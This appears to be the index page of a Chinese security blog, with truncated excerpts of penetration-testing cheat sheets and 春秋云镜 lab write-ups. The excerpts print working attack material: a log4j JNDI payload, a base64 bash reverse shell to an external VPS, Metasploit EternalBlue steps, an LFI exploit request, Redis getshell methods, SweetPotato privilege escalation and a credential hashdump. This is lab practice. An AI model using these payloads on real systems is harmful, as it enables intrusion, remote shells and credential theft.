晴川's Blog🌈

83433ea486119d7dc207c4e82ca6353e1b74aacdae3cff7174398ea6d1f64e1c865ef7a501384ed9e6fc8542feffa55666e13bc38c1576fda4624d4eaf68ac544b2d0b059eb74ceefc31d153627b753f387da642b4fbf1ea2a82ce1712ca5ba69f4b1b226ee07d9f05f44216400320bc6ccc9d68ba697928c17e08ca351b110dcd71787f9e9a356de763ff5fe6375275a4e1cf714720a3b230eb7d3cacec1f19e5a3a9e448c6ca99300c832814fa39ab92fd1cb1e6a41f3baa7e470a87ce200936a8fa402a21eec615b1a4e3c5f77ef48226bf699a30a0c880e57e542493fcae517c7e1178e7af5b804fa6e61444ea4cd939ac6b2bd3addee ...

渗透技巧小记录Nmap常用命令1234567nmap 192.168.0.1/24 //扫描网段下的地址nmap -sV -A 192.168.131.82 //基础的探测服务命令，端口及对应服务nmap -sS -sV -sC -p- 192.168.131.82-oN nmap_full_scan //SYN扫描，比较隐秘，文件会保存nmap -A -v -sV -T5 -p- --script=http-enum 192.168.131.82 //扫目录nmap --script=auth 192.168.0.101 //弱口令nmap --script=vuln 192.168.0.101 //扫描常见漏洞nmap --script=brute 192.168.0.101 //暴力破解 Fscan常用命令123456789101112fscan -h ipfscan -h ip -o 1.txt //保存到指定文件-p 1-65537 // 指定端口-m ssh -p 2222 -m ms17010 (指定模块) //指定模块ssh和端口-hf ip.t ...

春秋云镜-Privilege 靶标介绍： 在这个靶场中，您将扮演一名资深黑客，被雇佣来评估虚构公司 XR Shop 的网络安全。您需要通过渗透测试逐个击破公司暴露在公网的应用，并通过后渗透技巧深入 XR Shop 的内部网络，寻找潜在的弱点和漏洞，并通过滥用 Windows 特权获取管理员权限，最终并获取隐藏在其内部的核心机密。该靶场共有 4 个 Flag，分布于不同的靶机。 flag01 请获取 XR Shop 官网源码的备份文件，并尝试获得系统上任意文件读取的能力。并且，管理员在配置 Jenkins 时，仍然选择了使用初始管理员密码，请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins。 先是fscan扫扫看看 发现www.zip，利用代码审计 发现在/tools/content-log.php存在任意文件读取 123456789<?php$logfile = rawurldecode( $_GET['logfile'] );// M ...

内网横向记录MS17_010内网机器中存在永恒之蓝漏洞，利用kali自带的msf即可攻击 123456proxychains msfconsoleuse exploit/windows/smb/ms17_010_eternalblueshow payloads set payload windows/x64/meterpreter/bind_tcp_uuid //设置payloadset RHOSTS 172.22.1.21 //设置目标地址ipexploit 成功之后会有交互式shell 哈希传递攻击拿到用户的NTLM Hash值后可以进行哈希传递 原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务，而不用提供明文密码。 其中重要的是windows使用系统API(LsaLogonUser)生成hash进行认证，而不是用明文，所以利用hash即可模拟用户登录进行操作。还有的是如果密码长度大于15就不存在LM Hash，从windows2008开始微软默认禁用LM hash。 这类攻击适用于： 域/工作组环境 可以获得hash，但是条件不允许对 ...

春秋云镜-Exchange前言好久没打了春秋云镜的靶场了，来打个靶场回顾回顾 打攻防摸鱼的时候打的 嘻嘻 flag01上fscan搜集一波 8000端口有ERP 借鉴华夏ERPhttps://mp.weixin.qq.com/s?__biz=Mzg2OTg5NjE5MQ==&mid=2247484475&idx=1&sn=deee0c3bc0b9fe10b89af784947aa1a3&chksm=ce975eabf9e0d7bd5c952c462883fa89eafaadfba829dd2058fccb135a5a6970e29fe6487e1a&scene=126&sessionid=1686528295&key=42e64e73470f56ada54bd87e00fbb9ee86826bf40b566f978fb0f0e311c0eb4ab318884991ba35ad361aa1595ed3bd0846512b2fe73e212c0c074eb836d443f457f9ea24f06bf67d68ba10b149db1 ...

春秋云镜Certifyflag01信息搜集 访问8983端口，发现solr利用了log4j配置，那就打log4jRCE payload 1${jndi:ldap://101.34.80.152:1389/rxiwph} vps 启动 12345java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 101.34.80.152 -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuODAuMTUyLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}"nc -lvvp 9999 反弹shell后，找了一圈没有flag，进行提权操作 1sudo -l sudo -l提权发现grc 1sudo grc --help grc 是一个通用的颜色器，它可以根据配置文件为命令行工具的输出添加颜色，使得输出更加易于阅读和区分。以下选项： -e 或 - ...

春秋云镜Delegationflag01开局是个cms先看看后台弱口令，好家伙， admin/123456直接登上了 有本地文件包含漏洞 123456789POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1Host: 39.101.167.165Content-Length: 81X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0Content-Type: application/x-www-form-urlencoded;Cookie: PHPSESSID=os9kli93e59pjclq4361kaairm; loginfalse74c6352c5a281ec5947783b8a186e225=1; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313sid=#data_d_.._d_.._d_.._d_ ...

春秋云镜-Brute4Roadflag01信息搜集 看到开放了6379端口，redis，很明显要打redis了 redid常见利用方式： 一.利用ssh_keygen登录服务器 条件： 1、Redis服务使用ROOT账号启动 2、服务器开放了SSH服务，而且允许使用密钥登录，即可远程写入一个公钥，直接登录远程服务器。 二、利用计划任务反弹shell 条件： root启用Redis redis无密码或者弱密码 三、Redis直接写webshell 条件： 知道网站绝对路径，并且需要增删改查权限 root启动redis redis弱密码或者无密码 四、Redis主从复制getshell 条件： Redis 版本(4.x~5.0.5)（新增模块功能，可以通过C语言并编译出恶意.so文件） redis弱密码或者无密码 root启动redis 五.结合SSRF进行利用 条件： root启用redis 目标机存在dict协议 知道网站绝对路径 redis无密码或者弱密码 六、redis写lua 测试尝试进行写反弹任务 123456redis-cli -h 192.168.33.134 ...

春秋云镜Timeflag01端口扫描 7687和7474是neo4j，直接找cve https://github.com/zwjjustdoit/CVE-2021-34371.jar?tab=readme-ov-file 1java -jar rhino_gadget.jar rmi://39.99.224.197:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuODAuMTUyLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" flag02将fscan，frp下载到靶机 服务器python起http服务就行 123python3 -m http.server 8080wget http://101.34.80.152:8080/frpc.ini 查看ip 1234172.22.6.12 域控172.22.6.25 域内机器172.22.6.36 当前机器172.22.6.38 ...

春秋云镜Tsclient##flag01 fscan扫一扫 弱口令mssql 先执行命令，发现不行需要激活插件，上方激活组件即可 在此路径发现有可写权限，cs上马 这里卡了半天（后面做题慢慢发觉是cs回连间隔太长，调小一点就好 1C:/Users/Public/sweetpotato.exe -a "type C:\Users\Administrator\flag\flag01.txt" 我直接在MDUT执行 后边cs也行了，链接不咋稳定 flag02在运行一次马提升个权限 1shell c:\\users\\public\\sweetpotato.exe -a "c:\\users\\public\\beacon.exe" 信息搜集 1shell net user 12345678hashdump[*] Tasked beacon to dump hashes[+] host called home, sent: 82549 bytes[+] received password hashes:Administrator: ...